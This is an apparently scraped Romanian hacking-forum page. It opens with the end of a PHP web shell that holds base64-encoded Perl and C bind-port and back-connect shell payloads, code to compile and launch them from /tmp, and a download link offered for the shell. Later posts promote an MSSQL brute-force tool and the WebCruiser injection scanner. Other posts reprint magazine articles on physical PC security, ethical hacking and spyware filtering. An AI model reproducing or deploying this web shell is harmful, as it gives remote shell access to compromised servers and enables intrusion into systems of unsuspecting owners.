$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; ?> <h1>Network tools</h1><div class=content> <form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;"> <span>Bind port to /bin/sh</span><br/> Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>"> </form> <form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;"> <span>Back-connect to</span><br/> Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>"> </form><br> <?php if(isset($_POST['p1'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists('file_put_contents'); if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); @fclose($w); } } if($_POST['p1'] == 'bpc') { cf("/tmp/bp.c",$bind_port_c); $out = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>"; } if($_POST['p1'] == 'bpp') { cf("/tmp/bp.pl",$bind_port_p); $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>"; } if($_POST['p1'] == 'bcc') { cf("/tmp/bc.c",$back_connect_c); $out = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>"; } if($_POST['p1'] == 'bcp') { cf("/tmp/bc.pl",$back_connect_p); $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>"; } } echo '</div>'; printFooter(); } if( empty($_POST['a']) ) if(isset($default_action) && function_exists('action' . $default_action)) $_POST['a'] = $default_action; else $_POST['a'] = 'SecInfo'; if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) call_user_func('action' . $_POST['a']); ?> <div id="cot_tl_fixed"><marquee>Private Shell - Wireless crew © Copyleft 2009 -Pro_Wikileaks </marquee></div> Hacker-newbie.org </marquee></div> Donwload: http://dl.dropbox.com/u/39292033/t00lz/404.txt Parola constanta: 1337 Sursa: Insecurity.ro
  17. Scrie "www.exemplu. ro"
  18. Secure SQL Auditor provide MSSQL Brute Force Attacks tool which allows user to perform brute force attacks on an SQL Database Server. A brute force attack is a method of obtaining the user's authentication credentials. An attacker's common method is to guess the username password. brute force attacker mimics an attacker and conduct attack and try to login to the system by defeating password security. In this utility there are two files one containing usernames and other containing passwords are provided. This utility makes all the possible combinations and break password security. While performing penetration testing one can be very creative with the usernames and passwords files. User should always be careful in conducting this attack as it could result in locking system user account. 32Bit - 64 Bit Trial Version Secure Bytes - Register to Download Demo Software. Sursa: MSSQL Brute Force Attack - A SQL password testing tool via brute force attack
  19. Desi laptop-urile au constituit de multa vreme cea mai probabila tinta pentru furturile de calculatoare, calculatoarele desktop pot fi la randul lor vulnerabile. PC Guardian, Flexguard sau Securityware sunt doar cateva dintre numele rasunatoare de companii ce ofera produse pentru securizarea fizica a calculatoarelor, fixarea acestora pe birouri, ziduri sau alte obiecte. Asigurati-va ca punctul de ancorare este unul stabil. Pentru cei ce doresc protejarea modulelor de memorie, a placii grafice sau a hard discului, exista solutii pentru blocarea gaurilor unora din suruburile carcasei sau carcase ce vin echipate cu sisteme de securizare. Unitatea floppy disc sau porturile USB pot facilita hotilor inlaturarea informatiilor stocate pe calculator. Companii precum SecurityKit produc blocaje fizice pentru accesul la acestea. Exista totodata aplicatii ce monitorizeaza si restrictioneaza accesul la porturile USB. Si daca nu vreti sa cheltuiti nici un ban pentru achizitionarea unei solutii de securitate, Windows va permite dezactivarea majoritatii dispozitivelor hardware cu ajutorul Device Manager. Faceti un clic dreapta pe My Computer, selectati Manage, Device Manager, faceti un dublu clic pe drive-ul sau portul pe care doriti sa-l dezactivati, iar sub sectiunea "Device usage" selectati "Do not use this device (disable)". Oricum, aveti in vedere ca aceasta tehnica poate opri cu greu atacul unui hacker, care ar putea anula schimbarile, utilizand un cont de administrator. Setati o parola de startup. O parola de boot, adica una ce trebuie introdusa inainte de incarcarea sistemului de operare, este o metoda ce da rezultate in privinta atacurilor obisnuite. Totusi, daca nu ati blocat carcasa, un hacker hotarat ar putea reseta parola prin ajustarea unui jumper pe placa de baza. O astfel de parola protejeaza calculatorul atunci cand acesta este oprit, insa nu este de folos atunci cand lasati nesupravegheat calculatorul pornit. Multe screen savere ofera parole pentru astfel de situatii insa exista dispozitive speciale USB precum cele oferite de Griffin Tehnologies care, atunci cand sunt scoase din portul USB, blocheaza accesul la sistemul din care sunt scoase. Iar calculatorul este asigurat pana cand cheia este reintrodusa. Orice flash USB poate fi insa transformat intr-o unealta de securitate, cu ajutorul unui utilitar specific. DefendGate ofera o astfel de solutie pentru doar 5 dolari. Cea mai buna cale de a pastra in siguranta datele senzitive o reprezinta criptarea. Exista solutii pentru criptarea tuturor informatiilor de pe hard disc, solutii pentru combinarea unui software de criptare cu un cod de securitate aflat pe un dispozitiv USB. Programele de criptare va permit controlul fisierelor accesate - ideale atunci cand impartiti calculatorul cu altcineva sau cand munca pe care o depuneti ar putea fi pierduta sau furata. Aplicatiile utilizeaza un algoritm pentru a transforma textul documentelor in text criptat. Veti avea nevoie de o parola - fie software, fie un dispozitiv USB, pentru a descifra documentele. Daca ati ratacit parola si nu dispuneti de o solutie de backup, va puteti lua adio de la date. DESlock + este o aplicatie robusta, insa ceva mai dificil de utilizat. Este gratuita pentru uzul personal, insa costa 185 de dolari daca este achizitionata cu doua lacate USB - unul pentru activitatile zilnice, iar cealalalt pentru backup-ul cheilor de criptare. Va permite definirea si impartasirea cheilor de criptare cu alti utilizatori DESlock si va permite alegerea algoritmului de criptare: 3DES, Blowfish sau AES. Cu un simplu clic dreapta pe un fisier va puteti crea propriile arhive criptate. Pentru creari automate de atasamente e-mail, DESlock ofera plugin-uri pentru Microsoft Outlook si Lotus Notes. FileLock este o aplicatie cu o singura fereastra prin care, cu ajutorul drag-and-drop va permite mutarea fisierelor intr-o zona implicita, criptata, ce are propriul disc de volum. Dupa instalare, trebuie sa creati o parola si sa va rezervati o portiune din hard disc pentru stocarea fisierelor criptate. Astfel, la executiile viitoare ale aplicatiei, FileLock va ofera o mica fereastra orange, in spatele careia, odata ajunsi cu ajutorul parolei, va puteti accesa fisierele. FileLock nu prezinta optiuni de hardware USB, insa va permite sa efectuati backup la directorul criptat. FileLock foloseste un algoritm propriu pe 96 de biti, precum si un algoritm SEED pe 128 de biti. Programele "keylogger" nu sunt singura modalitate pentru hackeri de a captura parolele, e-mail-urile sau alte informatii introduse de la tastatura. KeyKatcher este un mic dispozitiv ce se monteaza intre cablul de la tastatura si portul PS2, inregistrand tastele apasate de la tastatura. Puteti folosi o asemenea solutie pentru a monitoriza tastele apasate la calculator, atunci cand sunteti plecat. Puteti inlocui securitatea oferita de o parola cu cea furnizata de propriul deget. Exista dispozitive USB sau de sine statatoare care asta fac: faciliteaza accesul la un sistem de calcul prin scanarea amprentelor. Atunci cand va inregistrati degetul la un asemenea scanner, software-ul produsului creeaza o macheta pentru compararea viitoarelor scanari. O modalitate de producere a unei citiri consistente o constituie pozitionarea varfului degetului in partea de sus a senzorului si rularea acestuia inspre inapoi. Majoritatea cititoarelor biometrice vin insotite de un software de management al parolei ce va permite asigurarea accesului la informatiile senzitive. Setarile unor asemenea dispozitive implica de obicei alegerea unui nume de utilizator si o parola, fie in cadrul unei ferestre Windows sau a unei pagini Web, precum si apasarea unei taste pentru scanare. Astfel, la apasarea acestuia vi se va solicita scanarea degetului in loc de introducerea parolei. Aceasta modalitate de autentificare nu este afectata de programele spyware sau de cele ce inregistreza datele introduse de la tastatura. Majoritate solutiilor software biometric ofera solutii de criptare a datelor, utilizand propria amprenta drept cheie. Lasati-va webcam-ul sa inregistreze imprejurimile atunci cand nu sunteti in birou sau acasa. Exista pachete speciale ce contin senzori de miscare si de sunet, inregistrare video, precum si vizualizare remote de pe orice alt calculator, prin intermediul unei conexiuni la Internet. Pentru cei ce doresc solutii mai sofisticate de securitate, camerele IP pot fi pozitionate oriunde inauntrul sau in afara casei sau biroului pentru transmiterea imaginilor catre orice alt calculator, prin Ethernet sau Wi-Fi. Exista hoti de date care nu stiu deloc programare. Adesea, acestia gasesc hard discuri ce contin informatii financiare sau alte date senzitive in magazinele de electronice second-hand. Reformatarea unui hard disc sau stergerea unei partitii nu sterge fisierele definitiv. Stocand fisierele in Windows Recycle Bin, inseamna ca acestea sunt de necitit pentru sistemul de operare, insa acestea pot fi vizualizate utilizand un software e recuperare a datelor. De aceea exista unelte specializate in stergerea definitiva a datelor. DBAN este o astfel de solutie software gratuita, un utilitat ce rescrie de mai multe ori fiecare portiune din hard disc de mai multe ori. DBAN poate crea fie o discheta bootabila, fie un fisier ISO pe care va trebui sa-l copiati pe un CD. Odata ce ati boot-at sistemul de pe un asemenea startup disk, cu doar cateva taste sunteti pe cale de incepe procesul de stergere definitiva a datelor stocate pe calculator. O alta solutie ar fi criptarea fisierelor inainte de stergerea acestora. Daca vreodata, un utilitar de recuperare le restaureaza, acestea nu vor putea fi decriptate. Pentru a folosi metoda de criptare inclusa in Windows XP Pro, faceti clic dreapta pe fisierele ce doriti sa le criptati, alegeti Properties, Advanced si bifati Encrypt contents to secure data, apoi dati un clic pe OK. Puteti cripta orice fisiere, mai putin fisierele sistem. Pentru cei ce detin un laptop, va recomandam pastrarea legaturii cu acesta. Chiar si cand intoarceti privirea, asigurati-va ca aveti o mana, un deget sau orice alta parte a corpului pe acesta. Purtati-va laptop-ul intr-o geanta care sa nu atraga prea multe priviri, eventual intr-un rucsac. Atunci cand va aflati in masina, incercati sa va acoperiti laptop-ul cu un ziar sau cu o haina de privirile indiscrete. Notati-va numarul serial al notebook-ului pentru a-l putea identifica in caz ca este furat. Exista programe software care contacteaza propriile centre de date atunci cand PC-urile sunt online. Acestea pot totodata sterge toate informatiile continute pe hard disc, daca laptop-ul in cauza a fost raportat disparut. Sursa: http://www.pcworld.ro/
  20. Traim intr-o lume in care pericolul se raspandeste cu o viteza exponentiala si este din ce in ce mai greu de stapanit, iar acest pericol a devenit o problema foarte importanta mai ales pentru companiile IT mandatate sa protejeze datele informatice de asa-numitii hoti cibernetici. Cu cativa ani in urma retelele reprezentau doar un prag catre lumea de afara; erau utilizate in principal pentru comunicarea intre angajati si arareori pentru comunicarea in afara companiei. Acum companiile nu isi mai pot izola reteaua interna de mediul extern. Comertul electronic, lanturile de furnizori de servicii si produse, telefonia mobila si o serie de alte cerinte sine qua non ale mediului de afaceri al secolului XXI nu mai permit acest lucru. Singurul drum pe care organizatiile trebuie sa-l urmeze acum este acela de a-si dezvolta retelele, aplicatiile si sistemele de operare, cat de bine se poate, acceptand ideea ca intotdeauna va exista un risc. Demult termenul hacker definea o persoana care are cunostintele si abilitatile de a propulsa industria IT. Odata cu raspandirea utilizarii calculatorului, termenul a inceput sa desemneze persoane care isi folosesc cunostintele in scopuri malitioase. In decursul a numai cativa ani termenul hacker a capatat conotatia unei amenintari iminente provocata de o persoana apta de a utiliza cunostinte in scopul de a provoca daune retelei, sistemelor si datelor stocate. Asadar, de la admiratie la teama, inovativul hacker a devenit acum o amenintare reala. Totusi sa nu ne grabim sa ii includem pe toti hackerii in aceeasi categorie. Este stiut faptul ca pe langa persoanele rau intentionate care doresc sa acceseze in datele companiilor managerii IT au descoperit o categorie aparte de hackeri, si anume hackerul etic. Atacul etic este de fapt un test de penetrare a retelei si reprezinta o simulare a unui atac real asupra retelelor, sistemelor si aplicatiilor. Acest tip de penetrare este menit sa identifice vulnerabilitatea infrastructurii IT dintr-o companie pentru a verifica in profunzime securitatea retelei. Intr-o maniera experimentala, reteaua este supusa atacului pentru a afla cat este de securizata si care sunt vulnerabilitatile de securitate pe care hackerii le pot specula pentru a patrunde in reteaua respectiva. Fara acest tip de atac probarea securitatii retelei ar fi precum testarea unui vas maritim fara a fi lansat la apa vreodata inainte de a pleca in cursa. Cat de importanta este aceasta metoda de testare a retelei in portofoliul managerilor IT? Intr-un sondaj de opinie efectuat pe un numar de 202 profesionisti IT, doar 8% dintre acestia au precizat ca retelele pe care le administreaza sunt impenetrabile. Desi piata ofera diferite utilitare pentru a testa retelele, niciunul nu este atat de relevant precum atacul etic. Acesta ofera posibilitatea ca autorii retelei sa poata identifica punctele vulnerabile ale retelei inainte ca o persoana rauvoitoare sa le foloseasca. Atacul etic joaca un rol profilactic pentru atacul real. Surprinzator, mai mult de o treime dintre specialistii chestionati au raspuns ca nu au efectuat un atac etic asupra retelelor proprii sau o fac cu o frecventa mai mica de o data pe an. De ce? In general, obstacolul obisnuit este lipsa de suport din partea conducerii, dar si frustrarea fata de rezultatul unei astfel de actiuni, ce i-ar putea demoraliza. Cel mai frecvent atacul etic este condus de catre entitati independente, care isi pot folosi benefic obiectivitatea in a simula un atac real. Pe de alta parte, independentii au abilitatea de a fi la curent cu tehnicile si utilitarele care sunt la indemana unui atacator, caci practic aceasta este ãpainea lorÓ! Mult mai mult decat atat, un hacker profesionist nu se poate compara cu un hacker incepator. Un angajat cu abilitati moderate poate totusi produce daune mult mai grave sau cel putin la fel de grave ca un hacker real. O simulare de atac etic nu include numai secventele de retea cu conectivitate la Internet. Multe alte aspecte ale infrastructurii IT necesita sa fie testate: subretelele, retelele virtuale private, retelele wireless si aplicatiile Web, precum si identificarea modemurilor neautorizate pentru a puncta slabiciunile retelelor. Un alt sondaj a relevat faptul ca subretelele sunt de cele mai multe ori precar securizate. Specialistii care au executat atacuri de tip hacker asupra retelei pe care o administreaza au observat ca 25% dintre vulnerabilitatile existente sunt critice si 42% sunt vulnerabilitati moderate. Retelele wireless, aplicatiile Web si cele accesibile prin Internet sunt oarecum mai expuse decat cele interne. Valoarea atacului etic este extinsa dincolo de identificarea vulnerabilitatilor. Printr-un astfel de atac putem face identificarea conformitatii cu standardele tehnice de lucru si standardele legale si de validare a investitiilor de securitate. Acesta poate fi un argument major pentru legitimitatea acestui tip de intruziune in fata conducerii. Ar fi o greseala sa promovam atacul etic ca un panaceu pentru toate problemele de securitate ale retelelor, dar este un utilitar cheie implicat in efortul fara sfarsit al profesionistilor IT in a-si securiza si proteja datele, retelele, aplicatiile in fata pericolelor lumii. Si, cine stie, poate este punctul de intoarcere al hackerului la obiectivul benefic pe care l-a avut la inceputuri. Cum sa filtrezi traficul malitios pe portul 80 Deoarece software-urile spyware se instaleaza si opereaza folosindu-se de portul 80, ele patrund in computerul tau fara ca noile generatii de firewall-uri sa te atentioneze in acest sens. Pachetele antivirus/firewall care filtreaza traficul executat pe portul 80 pentru paternurile spyware sunt: Fortinate Fortgate, McAfee Internet Security Suite, Norton Internet Security 2004 si Interscan Web Security Suite de la Trend Micro. Nici Trend Micro si nici Symantec nu ofera detectie spyware la nivel enterprise. Produsele consumer de la Norton contin 313 definitii de spyware, iar Symatec are in plan sa realizeze un software enterprise cu capabilitati asemanatoare cu cele ale produselor consumer. Detectia intruziunilor nu este cea mai corecta cale de a scana posibilele atacuri spyware deoarece se bazeaza pe semnatura atacului in loc sa analizeze modelul de trafic. Este greu sa depistezi un atac spyware prin urmarirea semnaturii acestuia, deoarece se instaleaza pe computer prin intermediul plug-in de ActiveX si obiectele browserului utilizat. Spyware-urile se schimba de la zi la zi. Ar fi nevoie de o intreaga echipa de cercetatori numai pentru a scrie semnaturile in fiecare zi si cu toate acestea nu ai putea fi capabil sa completezi fisierele de semnaturi. Chiar si asa, ai nevoie de modelul de recunoastere pentru a putea captura noile forme de spyware. Ca exemplu, sa luam un program spyware, si anume Trickler. Acesta descarca bitii de spyware in decursul unui numar de ore sau zile si le cumuleaza el insusi la un client. Acest proces trebuie inlaturat daca doriti sa nu va fie deconspirata confidentialitatea datelor. Sursa: http://www.pcworld.ro/
  21. Image: WebCruiser - Web Vulnerability Scanner WebCruiser - Web Vulnerability Scanner, a compact but powerful web security scanning tool that will aid you in auditing your site! It has a Vulnerability Scanner and a series of security tools. It can support scanning website as well as POC( Prooving of concept) for web vulnerabilities: SQL Injection, Cross Site Scripting, XPath Injection etc. So, WebCruiser is also an automatic SQL injection tool, a XPath injection tool, and a Cross Site Scripting tool! Key Features: * Crawler(Site Directories And Files); * Vulnerability Scanner(SQL Injection, Cross Site Scripting, XPath Injection etc.); * POC(Proof of Concept): SQL Injection, Cross Site Scripting, XPath Injection etc.; * GET/Post/Cookie Injection; * SQL Server: PlainText/Union/Blind Injection; * MySQL: PlainText/Union/Blind Injection; * Oracle: PlainText/Union/Blind/CrossSite Injection; * DB2: Union/Blind Injection; * Access: Union/Blind Injection; * Post Data Resend; * Administration Entrance Search; * Time Delay For Search Injection; * Auto Get Cookie From Web Browser For Authentication; * Report Output. System Requirement: .Net FrameWork 2.0 or higher If you can not run WebCruiser, please Download .NET FrameWork V2.0 From Microsoft: http://www.microsoft.com/downloads/details.aspx?FamilyID=0856EACB-4362-4B0D-8EDD-AAB15C5E04F5&displaylang=en Scan: http://up.ht/NtJxtW
  22. Altu' care a facut cont pe RST ca sa culeaga informatii
  23. Ai dreptate multi manelari pun botu' la asa ceva si zic ca este vreun OZN
  24. "sa dai cu mop-ul la brutarie":))))
×
×
  • Create New...